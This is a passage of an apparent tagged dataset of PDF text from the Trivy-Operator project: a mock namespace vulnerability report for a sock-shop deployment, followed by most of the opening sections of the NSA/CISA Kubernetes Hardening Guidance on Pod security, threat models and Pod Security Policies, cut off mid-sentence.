demonstrated real-world effectiveness. We\nhope this clarifies our contributions and addresses your con-\ncerns." - } - ] - }, - { - "tag": { - "category": "Provisioning", - "subcategory": "Security & Compliance", - "project_name": "Trivy-Operator", - "file_name": "design_namespace_security_report.pdf" - }, - "content": [ - { - "data": "Aqua Starboard Namespace Security Report \nNamespace: sock -shop \nGenerated on 18-FEB-2021 \nTechnical section: \nScanner \nversion \n \nStatistics: \nNumber of containers \nNumber of images \n \nSummary section: \n \nTop 5 vulnerable images by count : \nImage Tag Critical High Other \nweaveworksdemos/carts 0.4.8 9 5 55 \nlibrary/mongo latest 7 0 34 \nweaveworksdemos/catalogue 0.3.5 5 4 21 \nweaveworksdemos/catalogue -db 0.3.0 1 5 20 \nweaveworksdemos/front -end 0.3.12 0 3 17 \n \nTop 5 vulnerabilities by score: \nName Severity Score Affected pods \nCVE-2019 -20920 high 8.1 1 \nCVE-2020 -7788 high 7.3 2 \nCVE-2020 -15999 medium 6.5 1 \nCVE-2020 -1971 medium 5.9 1 \nCVE-2020 -8908 low 3.3 1 \n \nTop 5 failed workload configs: \ntrue Name Severity Category Affected pods \nfalse memoryLimitsMissing warning Resources 10 \nfalse notReadOnlyRootFilesystem warning Security 10 \nfalse livenessProbeMissing warning Health Checks 8 \nfalse runAsRootAllowed warning Security 7 \nfalse cpuRequestsMissing warning Resources 6 \n \n Details section (Do not repeat replicated pods with the same image in the same deployment) \n \nDeployment name: carts \nImage name: weaveworksdemos/carts :0.48 \nVulnerabilities 129 CRITICAL 341 HIGH 393 MEDIUM 47 LOW \nFailed Configs 2 Danger 10 Severe 15 Warning \n \nOnly critical and high vulnerabilities \nID Severity Resource Installed Version Fixed Version \nCVE-2018 -1312 CRITICAL apache2 -data 2.4.10 -10+deb8u7 2.4.10 -10+deb8u12 \n\u2026. \n \nOnly failed configs \nPASS ID Severity Category \nfalse cpuLimitsMissing warning Resources \n\u2026. \n \n=============== \n\u2026 More details section of other deployments/images. " - } - ] - }, - { - "tag": { - "category": "Provisioning", - "subcategory": "Security & Compliance", - "project_name": "Trivy-Operator", - "file_name": "NSA_Kubernetes_Hardening_Guidance_1.0.pdf" - }, - "content": [ - { - "data": " \n \n \n \nNational Security Agency \nCybersecurity and Infrastructure Security Agency \n \nCybersecurity Technical Report \n \n \n \n \n \nKubernetes Hardening Guidance \n \n \n \n \n \n \n \nAugust 2021 \nS/N U/OO/168286 -21 \nPP-21-1104 \nVersion 1.0 \n \n \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 ii \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nNotices and history \nDocument change history \nDate Version Description \nAugust 2021 1.0 Initial release \nDisclaimer of warranties and endorsement \nThe information and opinions contained in this document are provided \"as is\" and \nwithout any warranties or guarantees. Reference herein to any specific commercial \nproducts, process, or service by trade name, trademark, manufacturer, or otherwise, \ndoes not necessarily constitute or imply its endorsement, recommendation, or favoring \nby the United States Government, and this guidance shall not be used for advertising or \nproduct endorsement purposes. \nTrademark recognition \nKubernetes is a registered trademark of The Linux Foundation. \u25aa SELinux is a registered \ntrademark of the National Security Agency. \u25aa AppArmor is a registered trademark of \nSUSE LLC. \u25aa Windows and Hyper -V are registered trademarks of Microsoft Corporation. \n\u25aa ETCD is a registered trademark of Co reOS, Inc. \u25aa Syslog -ng is a registered trademark \nof One Identity Software International Designated Activity Company. \u25aa Prometheus is a \nregistered trademark of The Linux Foundation. \u25aa Grafana is a registered trademark of \nRaintank, Inc. dba Grafana Labs \u25aa Elasticsearch and ELK S tack are registered \ntrademarks of Elasticsearch B.V. \nCopyright recognition \nInformation, examples, and figures in this document are based on Kubernetes \nDocumentation by The Kubernetes Authors , published under a Creative Commons \nAttribution 4.0 l icense . \n \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 iii \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nPublication information \nAuthor(s) \nNational Security Agency (NSA) \nCybersecurity Directorate \nEndpoint Security \nCybersecurity and Infrastructure Security Agency (CISA) \nContact information \nClient Requirements / General Cybersecurity Inquiries: \nCybersecurity Requirements Center, 410 -854-4200, Cybersecurity_Requests@nsa.gov \n \nMedia i nquiries / Press Desk: \nMedia Relations, 443 -634-0721, MediaRelations@nsa.gov \n \nFor incident response resources, contact CISA at CISAServiceDesk@cisa.dhs.gov . \nPurpose \nNSA and CISA developed this document in furtherance of their respective cybersecurity \nmissions , including their responsibilities to develop and issue cybersecurity \nspecifications and mitigations. This information may be shared broadly to reach all \nappropriate stakeholders. \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 iv \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nExecutive summary \nKubernetes\u00ae is an open -source system that automates the deployment, scalin g, and \nmanagement of applications run in containers , and is often hosted in a cloud \nenvironment . Using this type of virtualized infrastructure can provide several flexibility \nand security benefits compared to traditional, monolithic software platforms. However, \nsecurely managing everything from microservices to the underlying infrastructure \nintroduces other complexities . The hardening guidance detailed in this report is \ndesigned to help organizations handle associated risks and enjoy the benefits of using \nthis technology. \nThree common sources of compromise in Kubernetes are supply chain risk s, malicious \nthreat actors, and i nsider threats . \nSupply chain risks are often challenging to mitigate and can arise in the container build \ncycle or infrastructure acquisi tion. Malicious threat actors can exploit vulnerabilities and \nmisconfigurations in components of the Kubernetes architecture , such as the control \nplane, worker nodes, or containerized applications. Insider threats can be \nadministrators, users, or cloud service providers. Insiders with special access to an \norganization\u2019s Kubernetes infrastructure may be able to abuse these privil eges. \nThis guidance describes the security challenges associated with setting up and securing \na Kubernetes cluster. It includes h ardening strategies to avoid common \nmisconfigurations and guide system administrators and developers of National Security \nSyste ms on how to deploy Kubernetes with example configurations for the \nrecommended hardening measures and mitigations . This guidance details the following \nmitigations: \n\uf0b7 Scan containers and Pods for vulnerabilities or misconfigurations . \n\uf0b7 Run containers and Pods w ith the least privileges possible. \n\uf0b7 Use network separation to control the amount of damage a compromise can \ncause . \n\uf0b7 Use firewalls to limit unneeded network connectivity and encryption to protect \nconfidentiality . \n\uf0b7 Use strong authentication and authorization to limit user and administrator \naccess as well as to limit the attack surface. \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 v \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \n\uf0b7 Use log auditing so that administrators can monitor activity and be alerted to \npotential malicious activity. \n\uf0b7 Periodic ally review all Kubernetes settings and use vulnerability scans to help \nensure risks are appropriate ly accounted for and security patches are applied . \nFor additional security hardening guidance , see the Center for Internet Security \nKubernetes benchmarks, the Docker and Kubernetes Security Technical \nImplementation Guides, the Cybersecurity and Infrastructure Security Agency (CISA) \nanalysis report, and Kubernetes documentation [1], [2], [3], [6]. \n \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 vi \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nContents \nKubernetes Hardening Guidance \u2026\u2026\u2026\u2026\u2026\u2026\u2026\u2026\u2026\u2026\u2026\u2026\u2026\u2026\u2026\u2026\u2026\u2026\u2026\u2026.. i \nExecutive summary ................................ ................................ ................................ ................. iv \nIntroduction ................................ ................................ ................................ ............................... 1 \nRecommendations ................................ ................................ ................................ ................... 2 \nArchitectural overview ................................ ................................ ................................ ............. 3 \nThreat model ................................ ................................ ................................ ............................. 5 \nKubernetes Pod security ................................ ................................ ................................ .......... 7 \n\u201cNon -root\u201d containers and \u201crootless\u201d container engines ................................ ........................... 7 \nImmutable container file systems ................................ ................................ ............................. 8 \nBuilding secure container images ................................ ................................ ............................ 8 \nPod Security Policies ................................ ................................ ................................ ............. 10 \nProtecting Pod service account tokens ................................ ................................ .................. 11 \nHardening container engines ................................ ................................ ................................ . 12 \nNetwork separation and hardening ................................ ................................ ....................... 13 \nNamespaces ................................ ................................ ................................ ......................... 13 \nNetwork policies ................................ ................................ ................................ .................... 14 \nResource policie s ................................ ................................ ................................ .................. 14 \nControl plane hardening ................................ ................................ ................................ ........ 15 \nEtcd ................................ ................................ ................................ ................................ ... 16 \nKubeconfig Files ................................ ................................ ................................ ................ 16 \nWorker node segmentation ................................ ................................ ................................ .... 16 \nEncrypti on ................................ ................................ ................................ ............................. 17 \nSecrets ................................ ................................ ................................ ................................ .. 17 \nProtecting sensitive cloud infrastructure ................................ ................................ ................ 18 \nAuthentication and authorization ................................ ................................ .......................... 18 \nAuthentication ................................ ................................ ................................ ........................ 19 \nRole-based a ccess control ................................ ................................ ................................ .... 20 \nLog auditing ................................ ................................ ................................ ............................ 22 \nLogging ................................ ................................ ................................ ................................ . 22 \nKubernetes native audit lo gging configuration ................................ ................................ .... 24 \nWorker node and container logging ................................ ................................ ................... 25 \nSeccomp: audit mode ................................ ................................ ................................ ........ 26 \nSYSLOG ................................ ................................ ................................ ............................ 27 \nSIEM platforms ................................ ................................ ................................ ...................... 27 \nAlerting ................................ ................................ ................................ ................................ .. 28 \nService meshes ................................ ................................ ................................ ..................... 29 \nFault tolerance ................................ ................................ ................................ ....................... 30 \nTools ................................ ................................ ................................ ................................ ..... 31 \nUpgrading and application security practices ................................ ................................ ...... 32 \nWorks cited ................................ ................................ ................................ ............................. 33 \nAppendix A: Example Do ckerfile for non -root application ................................ .................. 34 \nAppendix B: Example deployment template for read -only file systemfilesystem .............. 35 \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 vii \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nAppendix C: Example Pod Security Policy ................................ ................................ ........... 36 \nAppendix D: Example namespace ................................ ................................ ......................... 38 \nAppendix E: Example network policy ................................ ................................ .................... 39 \nAppendix F: Example LimitRange ................................ ................................ ......................... 40 \nAppendix G: Example ResourceQuota ................................ ................................ .................. 41 \nAppendix H: Example encryption ................................ ................................ .......................... 42 \nAppendix I: Example KMS configuration ................................ ................................ .............. 43 \nAppendix J: Example pod -reader RBAC Role ................................ ................................ ....... 45 \nAppendix K: Example RBAC RoleBinding and ClusterRoleBinding ................................ ... 46 \nAppendix L: Audit Policy ................................ ................................ ................................ ........ 48 \nAppendix M: Example flags with which to submit Audit Policy file to kube -apiserver ...... 49 \nAppendix N: Webhook conf iguration ................................ ................................ .................... 51 \n \nFigures \nFigure 1: High -level view of Kubernetes cluster components ................................ .............. 1 \nFigure 2: Kubernetes architecture ................................ ................................ .......................... 3 \nFigure 3: Pod components with sidecar proxy as logging container ................................ ... 7 \nFigure 4: A container build workflow , optimized with webhook and admission controller 9 \nFigure 5: Cluster leveraging service mesh to integrate logging with network secu rity .....30 \nTables \nTable I: Pod Security Policy components ................................ ................................ ............. 10 \nTable II: Control plane ports ................................ ................................ ................................ ...15 \nTable III: Worker node ports ................................ ................................ ................................ ...17 \n \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 1 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nIntroduction \nKubernetes, frequently abbreviated \u201cK8s\u201d, is an open -source container -orchestration \nsystem used to automate deploying, scaling, and managing containerized applications. \nIt manages all elements that make up a cluster, from each microservice in an \napplication to entire clusters. Using containerized applic ations as microservices can \nprovide more flexibility and security benefits compared to monolithic software platforms , \nbut also can introduce other complexities . \n \nFigure 1: High -level view of Kubernetes cluster components \nThis gu idance focuses on security challenges and suggests hardening strategies where \npossible that are applicable to administrators of National Security Systems and critical \ninfrastructure . Although this guidance is tailored to National Security Systems and \ncritical infrastructure organizations , administrators of federal and state, local, tribal, and \nterritorial (SLTT) government networks are also encouraged to implement the \nrecommendations provided. Kubernetes clusters can be complex to secure and are \noften abused in compromises that exploit their misconfigurations. The following \nguidance offers specific security configurations that can help build more secure \nKubernetes clusters. \n \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 2 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nRecommendations \nA summary of the key recommendations from each section are: \n\uf0b7 Kubernetes Pod security \n\uf0a7 Use containers built to run applications as non -root users \n\uf0a7 Where possible, run containers with immutable file systems \n\uf0a7 Scan container images for possible vulnerabilities or misconfigurations \n\uf0a7 Use a Pod Security Policy to enforce a min imum level of security \nincluding : \n\uf02d Preventing privileged containers \n\uf02d Denying container features frequently exploited to breakout, such \nas hostPID, hostIPC, hostNetwork, allowedHostPath \n\uf02d Rejecting containers that execute as the root user or allow \nelevation to root \n\uf02d Hardening applications against exploitation using security services \nsuch as SELinux\u00ae, AppArmor\u00ae, and seccomp \n\uf0b7 Network separation and hardening \n\uf0a7 Lock down access to control plane nodes using a firewal l and role -based \naccess control (RBAC) \n\uf0a7 Further limit a ccess to the Kubernetes etcd server \n\uf0a7 Configure control plane components to use authenticated, encrypted \ncommunications using Transport Layer Security (TLS) certificates \n\uf0a7 Set up network policies to isolate resources. Pods and services in different \nnamespaces can still communicate with each other unless additional \nseparation is enforced, such as network policies \n\uf0a7 Place all credentials and sensitive information in Kubernetes Secrets \nrather than in configuration files. Encrypt Secrets using a strong \nencryption met hod \n\uf0b7 Authentication and authorization \n\uf0a7 Disable anonymous login (enabled by default) \n\uf0a7 Use strong user authentication \n\uf0a7 Create RBAC policies to limit administrator, user, and service account \nactivity \n\uf0b7 Log auditing \n\uf0a7 Enable audit logging (disabled by default) \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 3 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \n\uf0a7 Persist logs to ensure availability in the case of node, Pod, or container \nlevel failure \n\uf0a7 Configure a metrics logg er \n\uf0b7 Upgrading and application security practices \n\uf0a7 Immediately apply security patches and updates \n\uf0a7 Perform periodic vulnerability scans and penetration te sts \n\uf0a7 Remove components from the environment when they are no longer \nneeded \nArchitectural overview \nKubernetes uses a cluster architecture. A Kubernetes cluster is comprised of a number \nof control plane s and one or more physical or virtual machines called worker nodes. The \nworker nodes host Pods, which contain one or more containers. The container is the \nexecutable image that contains a software package and all its dependencies. See \nFigure 2 : Kubernetes architecture. \n \nFigure 2: Kubernetes architecture 1 \nThe control plane makes decisions about the cluster . This includes scheduling \ncontainers to run , detecting /responding to failures , and starting new Pods when the \n \n1 Kubernetes Components by SupriyaSurbi and Fale used under CC BY 4.0 \n \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 4 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nnumber of replicas listed in a deployment file is unsatisfied. The fo llowing logical \ncomponents are all part of the control plane: \n\uf0b7 Controller manager (Default Port: 10252) - monitors the Kubernetes cluster to \ndetect and maintain several aspects of the Kubernetes environment including \njoining Pods to services, maintaining th e correct number of Pods in a set, and \nresponding to the loss of nodes. \n\uf0b7 Cloud controller manager (Default Port: 10258 ) - an optional component used \nfor cloud -based deployments. The cloud controller interfaces with the Cloud \nService Provider to manage load balancers and virt ual networking for the cluster. \n\uf0b7 Kubernetes Application Programing Interface ( API) Server (Default Port: \n6443 or 8080) - the interface through which administrators direct Kubernetes. As \nsuch, the API server is typically exposed outside of the control plane. The API \nServer is designed to scale and may exist on multiple control plane nodes. \n\uf0b7 Etcd\u00ae (Default Port Range: 2379 -2380) - the persistent backing store where all \ninformation regarding the state of the cluster is kept. Etcd is not intende d to be \nmanipulated directly but should be managed through the API Server. \n\uf0b7 Scheduler (Default Port: 10251) - tracks the status of worker nodes and \ndetermines where to run Pods. Kube -scheduler is intended to be accessible only \nfrom nodes within the control plane. \nKubernetes worker nodes are physical or virtual machines dedicate d to running \ncontainerized applications for the cluster. In addition to running a container engine, \nworker nodes host the following two services that allow orchestration from the con trol \nplane : \n\uf0b7 Kubelet (Default Port: 10251) - runs on each worker node to orchestrate and \nverify Pod execution . \n\uf0b7 Kube -proxy - a network proxy that uses the host \u2019s packet filtering capability to \nensure correct packet routing in the Kubernetes cluster. \nClust ers are commonly hosted using a cloud service provider (CSP) Kubernetes service \nor on-premises . When designing a Kubernetes environment , organizations should \nunderstand their responsibilities in securely maintaining the cluster . CSPs administer \nmost aspects of managed Kubernetes services, but the organization may need to \nhandle some aspects, such as authentication and authorization . \n\u25b2Return to Contents \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 5 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nThreat model \nKubernetes can be a valuable target for data and/or comput e power theft. While data \ntheft is traditionally the primary motivation, cyber actors seeking computational power \n(often for cryptocurrency mining) are also drawn to Kubernetes to harness the \nunderlying infrastructure. In addition to resource theft, cyber actors may also target \nKubernetes to cause a denial of service. The following threats represent some of the \nmost likely sources of compromise for a Kube rnetes cluster: \n\uf0b7 Supply Chain Risk - Attack vectors to the supply chain are diverse and \nchallenging to mi tigate. Supply chain risk is the risk that an adversary may \nsubvert any element that makes up a system, including product components, \nservices, or personnel that help supply the end product. This can include third -\nparty software and vendors used to create and manage the Kubernetes cluster. \nSupply chain compromises can affect Kubernete s at multiple levels including: \n\uf0a7 Container/Application level - The security of applications running in \nKubernetes and their third -party dependencies relies on the \ntrustworthines s of the developers and the defense of the development \ninfrastructure. A malicious container or application from a third party could \nprovide cyber actors with a foothold in the cluster. \n\uf0a7 Infrastructure - The underlying systems hosting Kubernetes have their \nown software and hardware dependencies. Any compromise of systems \nused as worker nodes or as part of the control plane could provide cyber \nactors with a foothold in the cluster. \n\uf0b7 Malicious Threat Actor - Malicious actors often exploit vulnerabilities to gain \naccess from a remote location. Kubernetes architecture exposes several APIs \nthat cyber actors could potentially leverage for remote exploitation. \n\uf0a7 Control plane - The Kubernetes control plane has a vari ety of components \nthat communicate to track and manage the cluster . Cyber actors \nfrequently take advantage of exposed control plane components lacking \nappropriate access controls. \n\uf0a7 Worker nodes - In addition to running a container engine, worker nodes \nhost the kubelet and kube -proxy service, which are potentially exploitable \nby cyber actors . Additionally, worker nodes exist outside of the locked -\ndown control plane and may be more accessible to cyber actors . \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 6 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \n\uf0a7 Containerized application s - Applications running inside the cluster are \ncommon targets . Applications are frequently accessible outside of the \ncluster , making them reachable by remote cyber actors . An actor can then \npivot from an already compromised Pod or escalate privileges within the \ncluster using an exposed application\u2019s internally accessible resources . \n\uf0b7 Insider Threat - Threat actors can exploit vulnerabilities or use privileges given \nto the individual while working within the organization. Individuals from within the \norganization are given special knowledge and privileges that can be used against \nKubernetes clusters. \n\uf0a7 Administrator - Kubernetes administrators have control over running \ncontainers , including the ability to execute arbitrary commands inside \ncontainerized environments . Kubernete s-enforced RBAC authorization \ncan help reduce the risk by restricting access to sensitive capabilities . \nHowever, because Kubernetes lacks two-person integrity controls , there \nmust be at least one administrative account capable of gaining control of \nthe clu ster. Administrators often have physical access to the systems or \nhypervisors, which could also be used to compromise the Kubernetes \nenvironment. \n\uf0a7 User - Containerized application users may have knowledge and \ncredentials to access containerized services in the Kubernetes cluster. \nThis level of access could provide sufficient means to exploit either the \napplication itself or other cluster components. \n\uf0a7 Cloud Service or Infrastructure Provider - Access to physical systems or \nhypervisor s managing Kubernetes node s could be used to compromise a \nKubernetes environment. Cloud Service Providers often have layers of \ntechnical and administrative controls to protect systems from privileged \nadministrators. \n \n\u25b2Return to Contents \n \n \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 7 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nKubernetes Pod security \nPods are the smallest deployable Kubernetes unit and consist of one or more \ncontainers. Pods are often a cyber actor \u2019s initial execution environment upon exploiting \na container . For this reason, Pods should be hardened to make exploitation mor e \ndifficult and to limit the impa ct of a successful compromise. \n \nFigure 3: Pod components with sidecar proxy as logging container \n\u201cNon-root\u201d containers and \u201c rootless\u201d container engines \nBy default, many container services run as the privileged root user, and applications \nexecute inside the container as root despite not requiring privileged execution. \nPreventing root execution by using non -root containers or a rootless container engine \nlimits the impact of a container compromise . Both of these methods affect the runtime \nenvironment significantly, so applications should be thoroughly tested to ensure \ncompatibility. \nNon-root containers : container engines allow containers to run applications a s a \nnon-root user with non -root group membership. Typically, this non -default setting is \nconfigured when the container image is built. Appendix A : Example Dockerfile for \nnon-root application shows an example Dockerfile that runs an application as a \n \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 8 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nnon-root user. Alternatively, Kubernetes can load containers into a Pod with \nSecurityContext:runAsUser specifying a non -zero user. Whi le the runAsUser \ndirective effectively force s non-root execution at deployment, NSA and CISA \nencourag e developers to build container applications to execute as a non -root user. \nHaving non -root execution integrated at build time provides better assurance that \napplications will function correctly without root privileges . \nRootless container engines : some co ntainer engines can run in an unprivileged \ncontext rather than using a daemon running as root . In this scenario, execution \nwould appear to use the root user from the containerized application\u2019s perspective, \nbut execution is remapped to the engine\u2019s user co ntext on the host . While rootless \ncontainer engines add an effective layer of security, many are currently released as \nexperimental and should not be used in a production environment. Administrators \nshould be aware of this emerging technology and seek adop tion of rootless \ncontainer engines when vendors release a stable version compatible with \nKubernetes. \nImmutable container file systems \nBy default, containers are permitted mostly unrestricted execution within their own \ncontext. A cyber actor who has gained execution in a container can create files, \ndownload scripts, and modify the application within the container . Kubernetes can lock \ndown a container\u2019s file system , thereby preventing many post -exploitation activities . \nHowever, these limitations also affect legitimate container applications and can \npotentially result in crashes or anomalous behavior . To prevent damaging legitimate \napplications , Kubernetes administrators can mount secondary read/write file systems for \nspecific directories where applications require write access. Appendix B : Example \ndeployment template for read-only filesystem shows an example immutable \ncontainer with a writable directory. \nBuilding secure container images \nContainer images are usually created by either building a container from scratch or by \nbuilding on top of an existing image pulled from a repository. In addition to using trusted \nrepositories to build containers, image scanning is key to ensuring deployed containers \nare secure. Throughout the container build workflow, images s hould be scanned to \nidentify outdated libraries, known vulnerabilities, or misconfigurations, such as insecure \nports or permissions. \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 9 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \n \nFigure 4: A container build workflow , optimized with webhook and admission controller \nOne appr oach to implementing image scanning is by using an admission controller. An \nadmission controller is a Kubernetes -native feature that can intercept and process \nrequests to the Kubernetes API prior to persistence of the object, but after the request is \nauthe nticated and authorized. A custom or proprietary webhook can be implemented to \nscan any image before it is deployed in the cluster. This admission controller could \nblock deployments if the image doesn\u2019t comply with the organization\u2019s security policies \ndefined in the webhook configuration [4]. \n \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 10 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nPod Security Policies \nA Pod Security Policy (PSP) is a cluster -wide policy that specifies security \nrequirements/defaults for Pods to execute within the cluster. While security mechanisms \nare often specified within Pod/deployment configurations, PSPs establish a minimum \nsecurity threshold to which all Pods must adhere. \nSome PSP fields provide default val ues used when a \nPod\u2019s configuration omits a field. Other PSP fields are \nused to deny the creation of non -conformant Pods. \nPSPs are enforced through a Kubernetes admission \ncontroller, so PSPs can only enforce requirements \nduring Pod creation. PSPs do not af fect Pods already running in the cluster. \nPSPs are useful technical controls to enforce security measures in the cluster. PSPs \nare particularly effective for clusters managed by admins with tiered roles . In these \ncases, top -level admins can impose defaults to enforce requirements on lower -level \nadmins. NSA and CISA encourage organizations to adapt the Kubernetes hardened \nPSP template in Appendix C: Example Pod Security Policy to their needs. The \nfollowing table describes some widely applicable PSP component s. \nTable I: Pod Security Policy components2 \nField Name(s) Usage Recommendations \nprivileged Control s whether Pods can run \nprivileged containers. Set to false. \nhostPID, hostIPC Controls whether containers can \nshare host process namespaces. Set to false. \nhostNetwork Controls whether containers can \nuse the host network. Set to false. \nallowedHostPaths Limits containers to specific paths \nof the host file system. Use a \u201cdummy\u201d path name (such \nas \u201c/foo\u201d marked as read -only). \nOmitting this field results in no \nadmission restrictions being placed \non containers. \nreadOnlyRootFilesystem Requires the use of a read only \nroot file system. Set to true when possible. \nrunAsUser, runAsGroup, \nsupplementalGroups, \nfsGroup Controls whether container \napplications can run with root \nprivileges or with root group \nmembership. \n - Set runAsUser to \nMustRunAsNonRoot. \n- Set runAsGroup to non -zero (See \nthe example in Appendix C: \nExample Pod Security Policy). \n \n2 https://kubernetes.io/docs/concepts/policy/pod -security -policy Pod creation adheres \nto the least restrictive \nauthorized policy. \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 11 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nField Name(s) Usage Recommendations \n- Set supplementalGroups to non -\nzero (see example i n appendix C). \n- Set fsGroup to non -zero (See the \nexample in Appendix C: Example \nPod Security Policy). \nallowPrivilegeEscalation Restricts escalation to root \nprivileges. Set to false. This measure is \nrequired to effectively enforce \n\u201crunAsUser: MustRunAsNo nRoot\u201d \nsettings. \nseLinux Sets the SELinux context of the \ncontainer. If the environment supports \nSELinux, consider adding SELinux \nlabeling to further harden the \ncontainer . \nAppArmor annotations Sets the AppArmor profile used by \ncontainers. Where possible, harden \ncontainerized applications by \nemploying AppArmor to constrain \nexploitation. \nseccomp annotations Sets the seccomp profile used to \nsandbox containers. Where possible, use a seccomp \nauditing profile to identify required \nsyscalls for runnin g applications; \nthen enable a seccomp profile to \nblock all other syscalls. \nNote : PSPs do not automatically apply to the entire cluster for the following reasons: \n\uf0b7 First, before PSPs can be applied, the PodSecurityPolicy plugin must be enabled \nfor the Kuber netes admission controller, part of kube-apiserver . \n\uf0b7 Second, the policy must be authorized through RBAC. Administrators should \nverify the correct functionality of implemented PSPs from each role within their \ncluster\u2019s organization. \nAdministrators should be cautious in environments with multiple PSPs as Pod creation \nadheres to the least restrictive authorized policy. The following command describe s all \nPod Security Policies for the given namespace, which can help to identify problematic \noverlapping policie s: \nkubectl get psp -n <namespace> \nProtecting Pod service account tokens \nBy default, Kubernetes automatically provisions a service account when creating a Pod \nand mounts the account\u2019s secret token within the Pod at runtime. Many containerized \napplications d o not require direct access to the service account as Kubernetes \norchestration occurs transparently in the background. If an application is compromised, \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 12 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \naccount tokens in Pods can be gleaned by cyber actor s and used to further compromise \nthe cluster. When an application does not need to access the service account directly , \nKubernetes administrators should ensure that Pod specifications disable the secret \ntoken being mounted. This can be accomplished using the \n\u201cautomountServiceAccountToken: false\u201d directive in the Pod\u2019s YAML \nspecification . \nHardening container engines \nSome platforms and container engines provide additional options to harden the \ncontainerized environments. A powerful example is the use of hypervisors to provide \ncontainer isolation. Hypervisors rely on hardware to enforce the virtualization boundary \nrather than the operating system. Hypervisor isolation is more secure than traditional \ncontainer isolation. Container engines running on the Windows\u00ae operating system can \nbe configured to use the built-in Windows hypervisor , Hyper -V\u00ae, to enhance security. \nAdditionally , some security focused container engines natively deploy each container \nwithin a lightweight hypervisor for defense -in-depth . Hypervisor -backed containers \nmitigate container breakout s. \n\u25b2Return to Contents \n \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 13 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nNetwork separation and h ardening \nCluster networking is a central concept of Kubernetes. Communication between \ncontainers, Pods, services, and external services must be taken into consideration. By \ndefault, there are few network policies in place to separate resources and prevent \nlateral m ovement or escalation if a cluster is compromised. Resource separation and \nencryption can be an effective way to limit a cyber actor \u2019s movement and escalation \nwithin a cluster. \n \nNamespaces \nKubernetes n amespaces are one way to partition cluster resources among multiple \nindividuals, teams, or applications within the same cluster. By default, namespaces are \nnot automatically isolated . However, namespaces do assign a label to a scope, which \ncan be used to specify authorization rules via RBAC and networking pol icies. In addition \nto network isolation, policies can limit storage and compute resources to provide better \ncontrol over Pods at the namespace level. \nThere are three namespaces by default , and they cannot be deleted: \n\uf0b7 kube -system (for Kubernetes components ) \n\uf0b7 kube -public (for public resources) \n\uf0b7 default (for user resources) \nUser Pods should not be placed in kube -system or kube -public, as these are reserved \nfor cluster services. A YAML file, shown in Appendix D: Example namespace , can be \nused to create new namespaces. Pods and services in different namespaces can still \ncommunicate with each other unless additional separation is enforced, such as network \npolicies . Key points \n\uf05d Use network policies and firewalls to separate and isolate resources. \n\uf05d Secure the control plane. \n\uf05d Encrypt traffic and sensitive data (such as 